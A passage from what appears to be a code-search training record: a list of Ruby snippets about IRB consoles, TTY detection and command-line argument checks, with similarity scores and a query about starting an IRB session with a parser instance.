"def console; end",
"def exec_exist?(*args)\n require \"tty-which\"\n TTY::Which.exist?(*args)\n end",
"def exec_exist?(*args)\n require 'tty-which'\n TTY::Which.exist?(*args)\n end",
"def exec_exist?(*args)\n require 'tty-which'\n TTY::Which.exist?(*args)\n end",
"def interactive?\n defined?(::Rails::Console) && $stdout.isatty && $stdin.isatty\n end",
"def validate_arguments()\n usage unless ARGV.count > 0\nend",
"def has_any?\n peek_console_input.size > 0\n end",
"def console_for(target)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{target.inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.conf[:DEFAULT_OBJECT] = target\n IRB.start\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def quit_with_usage_error\n quit_with_error( \"USAGE: ruby list_checker.rb <SCREEN_NAME>\" )\nend",
"def try_io_console\n require 'io/console'\n\n begin\n if output.tty? && IO.method_defined?(:winsize)\n yield output.winsize\n else\n false\n end\n rescue Errno::EOPNOTSUPP\n false\n end\n rescue LoadError\n warn 'no native io/console support' if @verbose\n false\n end",
"def get_command_line_argument\n if ARGV.empty?\n puts \"Usage: ruby lookup.rb <domain>\" \n exit\n end ARGV.first # get frst argument in commnad line\nend",
"def args_valid?\n\tARGV.size == 1 && File.exist?(ARGV[0]) || Dir.exist?(Dir.pwd + \"/\" + ARGV[0])\nend",
"def args_valid?\n\tARGV.size == 1 && File.exist?(ARGV[0]) || Dir.exist?(Dir.pwd + \"/\" + ARGV[0])\nend",
"def ensure_any_args\n if ARGV.size == 0\n $stderr.puts \"ERROR: Must provide the name of a koan\"\n exit -1\n end\nend",
"def show_command?\n ENV['DEBUG'] || ENV['SHOW_COMMAND']\n end",
"def right_type?\n ARGV[0].is_a?(String) && ARGV[1].is_number? && ARGV[2].is_number?\n end",
"def check_if_user_gave_input\n abort(\"mkdiruby: missing input\") if ARGV.empty?\n abort(\"mkdiruby: input contains more than one argument\") if ARGV.count > 1\nend",
"def console\nend",
"def has_scaleway_cmdline?\n if file_exist?(\"/proc/cmdline\") && file_read(\"/proc/cmdline\").include?(\"scaleway\")\n logger.trace(\"Plugin Scaleway: has_scaleway_cmdline? == true\")\n return true\n end\n logger.trace(\"Plugin Scaleway: has_scaleway_cmdline? == false\")\n false\n end",
"def shell?\n false\n end",
"def tty?()\n #This is a stub, used for indexing\n end",
"def arguments?\n @config.arguments == Cliqr::Config::ENABLE_CONFIG\n end",
"def prompting?\n verbose? || (STDIN.tty? && @io.kind_of?(StdioInputMethod) ||\n @io.kind_of?(ReidlineInputMethod) ||\n (defined?(ReadlineInputMethod) && @io.kind_of?(ReadlineInputMethod)))\n end",
"def console_for(bounding)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{eval('self', bounding).inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.start_session(bounding)\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def check_usage\n if ARGV[0].nil? \n puts \"Usage: differences.rb old-inventory new-inventory\"\n exit\n end\nend",
"def args?(args, min=1, max=nil)\n\t\t\tif not max then max = min end\n\t\t\tif (args.length < min or args.length > max or args[0] == \"-h\")\n\t\t\t\treturn false\n\t\t\tend\n\n\t\t\treturn true\n\t\tend",
"def main\n loop do\n # current path used for readline\n cmdline = Readline.readline(\"#{shell_format} \", true)\n break if %w[exit quit q].include?(cmdline)\n\n Readline::HISTORY.pop if %W[hist #{''}].include?(cmdline)\n check_type_of_command(cmdline)\n end\nend",
"def print_missing_sec_arg\n puts ARGV[0] + \" requires second argument\"\n print_usage\nend",
"def check_args(args)\r\n args.count == 1\r\n File.exist?(ARGV[0].to_s)\r\nrescue StandardError\r\n false\r\nend",
"def arguments_passed?\n !!(ARGV[0] && ARGV[1] && ARGV[2])\n end",
"def command_line\r\n ARGV.each do |arg|\r\n if arg == \"instructions\"\r\n instructions\r\n elsif arg == \"calculator\"\r\n ask_for_digits\r\n else\r\n \r\n end\r\n end\r\n \r\n end",
"def ShowPrompt(arg0 = nil)\n ret = _invoke(1610743953, [arg0], [VT_BSTR])\n @lastargs = WIN32OLE::ARGV\n ret\n end",
"def allowed_on_commandline?\n @deprecated == :allowed_on_commandline\n end",
"def tty?\n false\n end",
"def shell?\n @type == :shell\n end",
"def gui_enabled?\n !ENV.fetch('GUI', '').empty?\nend",
"def gui_enabled?\n !ENV.fetch('GUI', '').empty?\nend",
"def gui_enabled?\n !ENV.fetch('GUI', '').empty?\nend",
"def is_file_input?(command_line_arguments)\n\t\tcommand_line_arguments.any?\n\tend",
"def gui?; !ENV.fetch('OVJ_VM_GUI', '').empty?; end",
"def gui?; !ENV.fetch('OVJ_VM_GUI', '').empty?; end",
"def main(command_line_options=ARGV)\n parser = Slop::Parser.new cli_flags\n arguments = parse_arguments(command_line_options, parser)\n\n if arguments.key?(:ce) || arguments.key?(:ci) || arguments.key?(:h)\n if arguments.key?(:ci)\n\n end\n if arguments.key?(:ce)\n\n end\n if arguments.key?(:h)\n puts cli_flags\n end\n exit\n end\n\n elsif set?(arguments, :port)\n puts portquiz arguments[:port]\n elsif set?(arguments, :down)\n puts is_it_up arguments[:down]\n end",
"def helpAndVerFirstArg\n raise Trollop::HelpNeeded if ARGV.empty? || ARGV[0] == '--help' || ARGV[0] == '-h' # show help screen\n raise Trollop::VersionNeeded if ARGV[0] == '--version' || ARGV[0].downcase == '-v' # show version screen\nend",
"def command?(name)\n !which(name).nil?\n end",
"def get_console_input\n STDIN.noecho(&:gets).chomp\n end",
"def _tty?\n false\n end",
"def instruct_and_abort_if_user_gave_no_input\n if ARGV.empty?\n \tabort(\"Error - Search input empty - you shall enter '$ ruby google_searcher.rb 'your search on Google''\")\n end\nend",
"def color?\n $options[:color].nil? ? @outdev.tty? : $options[:color]\n end",
"def test_it_can_distinguish_i_through_main_menu\n runner = Runner.new\n $stdout = StringIO.new\n input = \"i\"\n result = runner.main_menu_options(input)\n\n assert_equal false, runner.play?(result)\n end",
"def check_usage\n unless ARGV.length == 2\n puts \"Usage: gen_vimwiki_dict.rb wiki_folder dict_filename\"\n exit\n end\nend",
"def check_no_extra_args!\n if @argv.length > 0\n Braid::Command.handle_error(\n Braid::BraidError.new('Extra argument(s) passed to command.'))\n end\n end",
"def console\n puts 'Entering debug console.'\n if RUBY_VERSION == '2.0.0'\n require 'byebug'\n byebug\n else\n require 'ruby-debug'\n Debugger.start\n debugger\n end\n puts 'Leaving debug console.'\n end",
"def winArgHack(file)\n ARGV.shift if !ARGV.empty? && ARGV[0] && File.exist?(ARGV[0]) && File.basename(ARGV[0]) == File.basename(file)\n end",
"def command?(name)\n !which(name).nil?\nend",
"def command?(name)\n !which(name).nil?\n end",
"def wrong_num_parameters?\n (ARGV.size != 1)\n end",
"def main\n if system(ARGV.join(\" \"))\n exit 0\n else\n main\n end\nend",
"def console\n @console ||= set_console\n @console\n end",
"def cmd_question argv\n setup argv\n msg run_cmd(\"?\")\n end",
"def terminal?; !!terminal_flag end",
"def terminal?; !!terminal_flag end",
"def command?(name)\n __getobj__.present?(name)\n end",
"def validate_and_parse_options\n # Checking ARGV validity *before* parse_options because parse_options\n # mangles ARGV in some situations\n if no_command_given?\n print_help_and_exit(1, NO_COMMAND_GIVEN)\n elsif no_subcommand_given?\n if (want_help? || want_version?)\n print_help_and_exit\n else\n print_help_and_exit(2, NO_COMMAND_GIVEN)\n end\n end\n end",
"def process_command_line_options\r\n begin\r\n defer, found = \"\", false\r\n opts = GetoptLong.new(\r\n [ \"--help\", \"-h\", \"-?\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--load\", \"-l\", GetoptLong::REQUIRED_ARGUMENT ],\r\n [ \"--debug\", \"-d\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--quit\", \"-q\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--words\", \"-w\", GetoptLong::NO_ARGUMENT ])\r\n\r\n # Process the parsed options\r\n opts.each do |opt, arg|\r\n unless found\r\n puts; found = true\r\n end\r\n\r\n case opt\r\n when \"--debug\"\r\n @debug = true\r\n when \"--load\"\r\n defer << \"load\\\"#{arg}\\\" \"\r\n when \"--quit\"\r\n defer << \")quit \"\r\n when \"--words\"\r\n defer << \")words \"\r\n else\r\n fail SilentExit\r\n end\r\n end\r\n\r\n puts if found\r\n rescue Exception => e\r\n puts\r\n puts \"fOOrth available options:\"\r\n puts\r\n puts \"--help -h -? Display this message and exit.\"\r\n puts \"--load -l <filename> Load the specified fOOrth source file.\"\r\n puts \"--debug -d Default to debug ON.\"\r\n puts \"--quit -q Quit after processing the command line.\"\r\n puts \"--words -w List the current vocabulary.\"\r\n puts\r\n raise SilentExit\r\n end\r\n\r\n defer\r\n end",
"def check_usage # (1)\n unless ARGV.length == 2 \n puts \"Cannot Proceed With The Operation: Please provide 2 textfile to compare\"\n exit\n end\nend",
"def try_console\n # if console service is available\n\n console = @framework.service :console\n main_thread = Thread.current\n\n if console.nil?\n # No console service present, looping on main thread\n event_loop(main_thread)\n else\n # Console service found, starting console on the foreground event loop on background thread\n begin\n @event_thread = Thread.new do\n event_loop(main_thread)\n end\n\n run_console console\n rescue => e\n puts \"Exception caught (#{e}) on main thread, shutting down\"\n puts e.backtrace.first\n end\n end\n end",
"def StartScreen(start)\n puts ' __ ______ _____________________ __ ________ ______ '.center(CONSOLE_WIDTH)\n puts ' / |/ / | / ___/_ __/ ____/ __ \\/ |/ / _/ | / / __ \\ '.center(CONSOLE_WIDTH)\n puts ' / /|_/ / /| | \\__ \\ / / / __/ / /_/ / /|_/ // // |/ / / / /'.center(CONSOLE_WIDTH)\n puts ' / / / / ___ |___/ // / / /___/ _, _/ / / // // /| / /_/ / '.center(CONSOLE_WIDTH)\n puts '/_/ /_/_/ |_/____//_/ /_____/_/ |_/_/ /_/___/_/ |_/_____/ '.center(CONSOLE_WIDTH)\n if start\n puts \"├─────────────────────────────┤\".center(CONSOLE_WIDTH)\n puts \"│ ENTER to start │\".center(CONSOLE_WIDTH)\n puts \"└─────────────────────────────┘\".center(CONSOLE_WIDTH)\n print \"\".center(CONSOLE_WIDTH / 2)\n STDIN.getc\n system \"clear\" or system \"cls\" # Clears the terminal screen so it doesn't look cluttered\n else\n puts \"├─────┬─────┬─────┬─────┬─────┤\".center(CONSOLE_WIDTH)\n end\nend",
"def check_command_line\n if (ARGV.length != 2)\n usage\n exit 2\n end\n\n if $options[\"daemon\"]\n $options[\"daemon\"] = File.expand_path($options[\"daemon\"], File.dirname(__FILE__))\n unless is_writable_dir? $options[\"daemon\"]\n usage\n $stderr.puts \"Can not create a file in the daemon directory: %s\" % [$options[\"daemon\"]]\n exit 5\n end\n end\n\n $topdir = $options[\"daemon\"] || File.expand_path(File.dirname(__FILE__))\n\n if $options[\"player-log-dir\"]\n $options[\"player-log-dir\"] = File.expand_path($options[\"player-log-dir\"], $topdir)\n unless is_writable_dir?($options[\"player-log-dir\"])\n usage\n $stderr.puts \"Can not write a file in the player log dir: %s\" % [$options[\"player-log-dir\"]]\n exit 3\n end \n end\n\n if $options[\"pid-file\"] \n $options[\"pid-file\"] = File.expand_path($options[\"pid-file\"], $topdir)\n unless ShogiServer::is_writable_file? $options[\"pid-file\"]\n usage\n $stderr.puts \"Can not create the pid file: %s\" % [$options[\"pid-file\"]]\n exit 4\n end\n end\n\n if $options[\"floodgate-games\"]\n names = $options[\"floodgate-games\"].split(\",\")\n new_names = \n names.select do |name|\n ShogiServer::League::Floodgate::game_name?(name)\n end\n if names.size != new_names.size\n $stderr.puts \"Found a wrong Floodgate game: %s\" % [names.join(\",\")]\n exit 6\n end\n $options[\"floodgate-games\"] = new_names\n end\n\n if $options[\"floodgate-history\"]\n $stderr.puts \"WARNING: --floodgate-history has been deprecated.\"\n $options[\"floodgate-history\"] = nil\n end\n\n $options[\"max-moves\"] ||= ShogiServer::Default_Max_Moves\n $options[\"max-moves\"] = $options[\"max-moves\"].to_i\n\n $options[\"least-time-per-move\"] ||= ShogiServer::Default_Least_Time_Per_Move\n $options[\"least-time-per-move\"] = $options[\"least-time-per-move\"].to_i\nend",
"def terminal? # :nodoc:\n true\n end",
"def display_menu\n font_sml = TTY::Font.new(:straight)\n font_big = TTY::Font.new(:doom)\n font_col = Pastel.new\n system \"clear\"\n # if statement to detect if arguments given in command line\n if ARGV.length == 1\n puts font_sml.write(\"#{ARGV[0]}, Welcome to...\") \n ARGV.clear\n elsif ARGV.length > 1 && ARGV[1] == \"-s\"\n puts font_sml.write(\"#{ARGV[0]}, Welcome to...\") \n ARGV.clear\n random_character\n pre-game\n else\n puts font_sml.write(\"Welcome to...\")\n end\n puts font_col.red(font_big.write(\"RPSG\"))\n puts \"If you haven't played before, it is advisable to read the instructions.\"\n # displays game menu to player\n return $prompt.select(\"What would you like to do?\",\n [\"Start New Game\", \"View Instructions\", \"View Leaderboard\", \"Exit Game\"])\nend",
"def get_command_line_argument\n if ARGV.empty?\n puts \"Usage: ruby lookup.rb <Domain>\"\n exit\n end\n ARGV.first\nend",
"def arguments_valid?\n true if ['install','list','uninstall'].include?(@arguments[0])\n end",
"def is_launcher? (process)\n is_admin? or login == process.variables['launcher']\n end",
"def terminal?\n true\n end",
"def main(*args)\n #puts self.class # TODO: fix help\n raise NoCommandError\n end"
] |
[
"0.7050839",
"0.638266",
"0.6313518",
"0.63002616",
"0.6237337",
"0.62016934",
"0.5997924",
"0.59475183",
"0.5905552",
"0.5887037",
"0.5845508",
"0.58440936",
"0.58061516",
"0.5805057",
"0.5805057",
"0.5805057",
"0.5799348",
"0.5799348",
"0.57903284",
"0.5789808",
"0.57686764",
"0.57686764",
"0.57567817",
"0.57548475",
"0.57153904",
"0.57153904",
"0.57153344",
"0.57125884",
"0.57125884",
"0.5695422",
"0.567539",
"0.56698436",
"0.5623646",
"0.56085485",
"0.560795",
"0.56066996",
"0.56038827",
"0.56038827",
"0.5577258",
"0.55630183",
"0.55607826",
"0.55603945",
"0.5557592",
"0.55527925",
"0.55347914",
"0.55264926",
"0.5517491",
"0.5506222",
"0.55051386",
"0.5503461",
"0.54992384",
"0.5451312",
"0.54453075",
"0.5441817",
"0.543326",
"0.5432765",
"0.54263914",
"0.54119",
"0.54068583",
"0.5385344",
"0.5380426",
"0.5380426",
"0.5380426",
"0.53790945",
"0.5376329",
"0.5376329",
"0.53745383",
"0.5366767",
"0.53565186",
"0.53501964",
"0.53465664",
"0.5328803",
"0.53190315",
"0.531249",
"0.5308584",
"0.53003734",
"0.5296756",
"0.5280868",
"0.52774173",
"0.52732784",
"0.5273275",
"0.52711123",
"0.5265672",
"0.52642506",
"0.52641875",
"0.52641875",
"0.52602696",
"0.5248993",
"0.52419597",
"0.5240514",
"0.5233961",
"0.5233716",
"0.52305657",
"0.52293813",
"0.52264696",
"0.5224716",
"0.52237254",
"0.52216655",
"0.5214324",
"0.521277"
] |
0.6389698
|
1
|
Start up a new IRB console session giving the user access to the RbGCCXML parser instance to do realtime querying of the code they're trying to wrap
|
def start_console
puts "IRB Session starting. @parser is now available to you for querying your code. The extension object is available as 'self'"
IRB.start_session(binding)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def initialize(*args)\n ## maybe set some opts here, as in parse_opts in irb/init.rb?\n\n unless @@irb_setup_done\n @@irb_setup_done = true\n\n conf = IRB.conf\n \n if File.directory?(\"tmp\")\n conf[:HISTORY_FILE] = \"tmp/.irb_shell_history\"\n else\n conf[:HISTORY_FILE] = \".irb_shell_history\"\n end\n\n IRB.setup nil\n \n at_exit do\n IRB.irb_at_exit\n end\n end\n\n workspace = IRB::WorkSpace.new(*args)\n\n if conf[:SCRIPT] ## normally, set by parse_opts\n @irb = IRB::Irb.new(workspace, conf[:SCRIPT])\n else\n @irb = IRB::Irb.new(workspace)\n end\n\n conf[:IRB_RC].call(@irb.context) if conf[:IRB_RC]\n conf[:MAIN_CONTEXT] = @irb.context\n end",
"def console\n\t\t\tcla = as_class_name(@arguments.first)\tif @arguments.length == 1\n\t\t File.open(\"./tmp/irb-setup.rb\", 'w') do |f|\n\t\t f.puts \"# Initializes the environment for IRb.\"\n\t\t f.puts \"Experiment::Config::init #{@options.env.inspect}\"\n\t\t f.puts \"$: << '#{File.expand_path(\".\")}/'\"\n\t\t if @arguments.length == 1\n\t\t f.puts \"require 'experiments/#{@arguments.first}/#{@arguments.first}'\"\n\t\t f.puts \"def experiment\"\n \t\t f.puts \" @experiment ||= #{cla}.new :normal, #{@arguments.first.inspect}, OpenStruct.new(#{@options.marshal_dump})\"\n \t\t f.puts \"end\"\n \t\t f.puts \"experiment #load up the configs\"\n \t\t else\n \t\t f.puts 'Dir[\"./app/**/*.{rb,o,so,dll,bundle}\"].each{|e| require e.gsub(/\\.(rb|so|o|dll|bundle)$/, \"\") }'\n \t\t f.puts \"Experiment::Config::load '', #{options.opts.inspect}\"\n\t\t end\n\t\t \n\t\t end\n irb = RUBY_PLATFORM =~ /(:?mswin|mingw)/ ? 'irb.bat' : 'irb'\n libs = \" -r irb/completion\"\n libs << \" -r #{File.dirname(__FILE__) + \"/base\"}\"\n libs << \" -r./experiments/experiment\"\n libs << \" -r ./tmp/irb-setup.rb\"\n puts \"Loading #{@options.env} environment...\"\n exec \"#{irb} #{libs} --simple-prompt\"\n\t end",
"def cmd_irb(*args)\n\t\tprint_status(\"Starting IRB shell\")\n\t\tprint_status(\"The 'client' variable holds the meterpreter client\\n\")\n\n\t\tRex::Ui::Text::IrbShell.new(binding).run\n\tend",
"def reset_irb\n say \"Began new irb session\"\n @session = try_eval(\"!INIT!IRB!\")\n end",
"def start\n return if initialized\n puts copyright\n argv = ARGV\n ARGV.clear\n IRB.start\n ARGV.replace(argv)\n end",
"def console_for(bounding)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{eval('self', bounding).inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.start_session(bounding)\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def run_console\n require 'irb'\n require 'irb/completion'\n require 'pp'\n load_code\n connect_to_database true\n CloudCrowd::Server # Preload server to autoload classes.\n Object.send(:include, CloudCrowd)\n IRB.start\n end",
"def main\n\n # test\n\n # Console.new\n console_start\n end",
"def cmd_irb(*args)\n expressions = []\n\n # Parse the command options\n @@irb_opts.parse(args) do |opt, idx, val|\n case opt\n when '-e'\n expressions << val\n when '-h'\n return cmd_irb_help\n end\n end\n\n session = self\n framework = self.framework\n\n if expressions.empty?\n print_status('Starting IRB shell...')\n print_status(\"You are in the \\\"self\\\" (session) object\\n\")\n\n Rex::Ui::Text::IrbShell.new(self).run\n else\n # XXX: No vprint_status here\n if framework.datastore['VERBOSE'].to_s == 'true'\n print_status(\"You are executing expressions in #{binding.receiver}\")\n end\n\n expressions.each { |expression| eval(expression, binding) }\n end\n end",
"def safely_build_irb_instance(session, workspace)\n irb = IRB::Irb.allocate\n irb.instance_variable_set :@context, IRB::Context.new(irb, workspace, nil)\n irb.instance_variable_set :@signal_status, :IN_IRB\n irb.instance_variable_set :@scanner, RubyLex.new\n\n begin\n irb.context.main.extend IRB::ExtendCommandBundle\n rescue NameError, TypeError\n # Potential `NameError`: undefined method `irb_print_working_workspace' for class `#<Class:#420>'.\n # Ignore it.\n end\n\n irb.context.main.extend Commands.new(session)\n irb\n end",
"def open\n @is_running = true\n run_interpreter\n end",
"def start\n greeting\n console_search\n goodbye\n end",
"def console\n repo = Repo.new\n repo.attach\n\n unless repo.has_repository?\n abort \"Cannot launch console: ripe repo not initialized\"\n end\n\n # Do not send arguments to the REPL\n ARGV.clear\n\n Ripl.config[:prompt] = proc do\n # This is the only place I could think of placing +Hirb#enable+.\n Hirb.enable unless Hirb::View.enabled?\n 'ripe> '\n end\n\n # Launch the REPL session in the context of +WorkerController+.\n Ripl.start :binding => repo.controller.instance_eval { binding }\n end",
"def start()\n\t\tprintinfo \"start execute the usrpse wrapper now...\"\n\t\tprintinfo \"configure the system buffer size... \"\n\t\t#`sudo sysctl -w net.core.wmem_max=1048576`\n\t\t#`sudo sysctl -w net.core.rmem_max=50000000`\t\t\n\t\t \n\t\t# open a child process to execute the sensing binaries \n\t\tPTY.spawn @cmd do |r,w,p|\n\t\t\t# close the write pipe\n\t\t\tw.close\n\t\t\t# assign the process id to the global variable\n\t\t\t$pid_global=p\n\t\t\t# start the loop to read and process the output \n\t\t\tloop { \n\t\t\t\tline=r.gets\n\t\t\t\tputs line\n\t\t\t\tif @output_mode == 'OML'\t\n\t\t\t\t\tif line.split(',').length >= 3 \n\t\t \t\t\t\tif numeric?(line.split(',')[3])\n\t\t\t \t\t\t\teval(@oml_inject_str)\n\t\t\t \t\t\tend\n\t\t\t \t\tend\n\t\t\t \tend\n\t\t\t}\n\t\tend\n\tend",
"def irb\n if @console\n @console.show\n else\n # We need to address compiled RubyConsole via full java name... Why?\n @console ||= com.moneydance.modules.features.ruby.rb.RubyConsole.new self\n end\n end",
"def run\n Curses.init_screen\n\n init_style\n\n Curses.noecho\n Curses.curs_set 0 # invisible\n\n @message = RDoc::RI::Browser::Message.new\n\n @display = RDoc::RI::Browser::Display.new self\n @display.show HELP, nil, false\n\n trap_resume do\n event_loop\n end\n end",
"def start_interaction(sandbox=true)\n $__env__ = inspect_env\n puts \"Caller trace:\"\n Kernel.puts RMTools.format_trace(caller(2)).join(\"\\n\")\n puts \"Environment:\"\n $__env__.present\n $__binding__ = self\n if defined? SCRIPT_LINES__ and (file = caller(0)[0].parse(:caller).file) =~ /^\\(irb/\n SCRIPT_LINES__[\"(#{file[1..-2].next_version '#'})\"] = []\n end\n \n $__MAIN__.irb$__binding__\n \n if sandbox\n self.eval($__env__.keys.map {|k, v| \"#{k} = $__env__[#{k.inspect}]\" if k != 'self'} * '; ')\n end\n $__env__ = nil\n end",
"def run\n if (! @running.nil?)\n raise \"Already running\"\n end\n info(VERSION_STRING)\n resetState\n comm = Hash.new\n comm[:comms_name] = @managerName\n comm[:handler] = self\n comm[:createflag] = true\n comm[:config] = @config[:communicator]\n RMCommunicator.instance.init(comm)\n RMCommunicator.instance.reset\n\n @running = ConditionVariable.new\n if @interactive\n require 'irb'\n ARGV.clear\n ARGV << \"--simple-prompt\"\n ARGV << \"--noinspect\"\n IRB.start()\n else\n @mutex = Mutex.new\n @mutex.synchronize {\n @running.wait(@mutex)\n }\n end\n end",
"def start\n @cmd.parse\n end",
"def load\n Pry.initial_session_setup\n define_additional_commands\n\n Pry.config.hooks.add_hook(:when_started, :start_non_interactively) do |o, t, _pry_|\n non_interactive_mode(_pry_)\n end\n\n Pry.start(Pry.toplevel_binding,\n :input => @content,\n :input_stack => [StringIO.new(\"exit-all\\n\")])\n end",
"def initialize\n IRB.__send__(:set_encoding, Reline.encoding_system_needs.name, override: false)\n super\n\n @line_no = 0\n @line = []\n @eof = false\n\n @stdin = ::IO.open(STDIN.to_i, :external_encoding => IRB.conf[:LC_MESSAGES].encoding, :internal_encoding => \"-\")\n @stdout = ::IO.open(STDOUT.to_i, 'w', :external_encoding => IRB.conf[:LC_MESSAGES].encoding, :internal_encoding => \"-\")\n\n if Reline.respond_to?(\"basic_word_break_characters=\")\n Reline.basic_word_break_characters = IRB::InputCompletor::BASIC_WORD_BREAK_CHARACTERS\n end\n Reline.completion_append_character = nil\n Reline.completer_quote_characters = ''\n Reline.completion_proc = IRB::InputCompletor::CompletionProc\n Reline.output_modifier_proc =\n if IRB.conf[:USE_COLORIZE]\n proc do |output, complete: |\n next unless IRB::Color.colorable?\n IRB::Color.colorize_code(output, complete: complete)\n end\n else\n proc do |output|\n Reline::Unicode.escape_for_print(output)\n end\n end\n Reline.dig_perfect_match_proc = IRB::InputCompletor::PerfectMatchedProc\n Reline.autocompletion = IRB.conf[:USE_AUTOCOMPLETE]\n if IRB.conf[:USE_AUTOCOMPLETE]\n Reline.add_dialog_proc(:show_doc, SHOW_DOC_DIALOG, Reline::DEFAULT_DIALOG_CONTEXT)\n end\n end",
"def console_for(target)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{target.inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.conf[:DEFAULT_OBJECT] = target\n IRB.start\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def setup(name=nil, show_constants=true)\n unless name\n tf = RubyVM::Frame.get(1)\n name = File.basename(tf.source_container[1], '.rb')\n end\n if ARGV.size > 0 && ARGV[0] == 'debug'\n require_relative '../lib/trepanning'\n dbgr = Trepan.new\n dbgr.debugger\n else\n dbgr = MockDebugger.new\n end\n\n cmds = dbgr.core.processor.commands\n cmd = cmds[name]\n cmd.proc.frame_setup(RubyVM::Frame::get(1))\n show_special_class_constants(cmd) if show_constants\n\n def cmd.confirm(prompt, default)\n true\n end\n def cmd.errmsg(message, opts={})\n puts \"Error: #{message}\"\n end\n def cmd.msg(message, opts={})\n puts message\n end\n def cmd.msg_nocr(message, opts={})\n print message\n end\n def cmd.section(message, opts={})\n puts \"Section: #{message}\"\n end\n\n return dbgr, cmd\n end",
"def start\n require 'irbtools'\n end",
"def initialize(workspace = nil, input_method = nil)\n @context = Context.new(self, workspace, input_method)\n @context.main.extend ExtendCommandBundle\n @signal_status = :IN_IRB\n @scanner = RubyLex.new\n end",
"def start(options={})\n in_xterm_state(options) do\n initialize_screen\n yield self\n event_loop\n end\n end",
"def start\n Vedeu.trigger(:_drb_start_)\n\n Vedeu::Terminal.open do\n Vedeu::Terminal.set_cursor_mode\n\n Vedeu.trigger(:_initialize_)\n\n runner { main_sequence }\n end\n end",
"def start_repl\n require 'readline'\n\n loop do\n line = Readline.readline '>> ', true\n puts \"=> #{eval_ruby line, '(opal)'}\"\n end\n end",
"def with_cli(cli); end",
"def initialize(run, xml)\n @run = run\n\n parse_xml(xml)\n end",
"def initialize(session, workspace = nil, input_method = nil, output_method = nil)\n @session = session\n if workspace\n @workspace = workspace\n else\n @workspace = WorkSpace.new\n end\n @thread = Thread.current if defined? Thread\n #@pry_level = 0\n\n # copy of default configuration\n @ap_name = Pry.conf[:AP_NAME]\n @rc = Pry.conf[:RC]\n @load_modules = Pry.conf[:LOAD_MODULES]\n\n @use_readline = Pry.conf[:USE_READLINE]\n @verbose = Pry.conf[:VERBOSE]\n @io = nil\n\n self.inspect_mode = Pry.conf[:INSPECT_MODE]\n self.math_mode = Pry.conf[:MATH_MODE] if Pry.conf[:MATH_MODE]\n self.use_tracer = Pry.conf[:USE_TRACER] if Pry.conf[:USE_TRACER]\n self.use_loader = Pry.conf[:USE_LOADER] if Pry.conf[:USE_LOADER]\n self.eval_history = Pry.conf[:EVAL_HISTORY] if Pry.conf[:EVAL_HISTORY]\n\n @ignore_sigint = Pry.conf[:IGNORE_SIGINT]\n @ignore_eof = Pry.conf[:IGNORE_EOF]\n\n @back_trace_limit = Pry.conf[:BACK_TRACE_LIMIT]\n\n self.prompt_mode = Pry.conf[:PROMPT_MODE]\n\n if Pry.conf[:SINGLE_IRB] or !defined?(Pry::JobManager)\n @pry_name = Pry.conf[:PRY_NAME]\n else\n @pry_name = Pry.conf[:PRY_NAME]+\"#\"+Pry.JobManager.n_jobs.to_s\n end\n @pry_path = \"(\" + @pry_name.to_s + \")\"\n\n case input_method\n when nil\n case use_readline?\n when nil\n if (defined?(ReadlineInputMethod) && STDIN.tty? &&\n Pry.conf[:PROMPT_MODE] != :INF_RUBY)\n @io = ReadlineInputMethod.new\n else\n @io = StdioInputMethod.new\n end\n when false\n @io = StdioInputMethod.new\n when true\n if defined?(ReadlineInputMethod)\n @io = ReadlineInputMethod.new\n else\n @io = StdioInputMethod.new\n end\n end\n\n when String\n @io = FileInputMethod.new(input_method)\n @pry_name = File.basename(input_method)\n @pry_path = input_method\n else\n @io = input_method\n end\n self.save_history = Pry.conf[:SAVE_HISTORY] if Pry.conf[:SAVE_HISTORY]\n\n if output_method\n @output_method = output_method\n else\n @output_method = StdioOutputMethod.new\n end\n\n @echo = Pry.conf[:ECHO]\n if @echo.nil?\n @echo = true\n end\n self.debug_level = Pry.conf[:DEBUG_LEVEL]\n end",
"def initialize\n DebugOutput.debug_level = DEBUG_LEVEL\n\n @is_running = false\n\n @parser = Parser.new self\n @tokenizer = Tokenizer.new\n @symbol_table = SymbolTable.new\n\n init_constants\n end",
"def initialize\n root = Rush::Dir.new('/')\n home = Rush::Dir.new(ENV['HOME']) if ENV['HOME']\n pwd = Rush::Dir.new(ENV['PWD']) if ENV['PWD']\n\n @config = Rush::Config.new\n\n @history = Coolline::History.new config.history_file.full_path\n\n @readline = Coolline.new do |c|\n c.transform_proc = proc { syntax_highlight c.line }\n c.completion_proc = proc { complete c.completed_word }\n end\n\n @box = Rush::Box.new\n @pure_binding = @box.instance_eval \"binding\"\n $last_res = nil\n\n eval config.load_env, @pure_binding\n\n commands = config.load_commands\n Rush::Dir.class_eval commands\n Array.class_eval commands\n\n # Multiline commands should be stored somewhere\n @multiline_cmd = ''\n end",
"def irb\n ARGV.clear\n require 'irb'\n IRB.setup nil\n IRB.conf[:MAIN_CONTEXT] = IRB::Irb.new.context\n require 'irb/ext/multi-irb'\n IRB.irb nil, self\n end",
"def interactive_parser ( )\n puts 'Press <Enter> to exit...'\n #\n # Цикл обработки ввода.\n loop {\n\tstr = interactive_input( )\n\tbreak if str == \"\"\n\t#\n\t# Цикл посимвольной классификаци.\n\tstr.bytes.each do |c|\n\t parse( c.chr )\n\t puts 'parser: ' + @parserstate\n\t puts 'symbol: ' + interactive_output( c.chr ).to_s\n\t puts 'buffer: ' + @buffer.to_s\n\t puts 'state: ' + @chain.last.statename\n\t puts\n\tend\n }\n end",
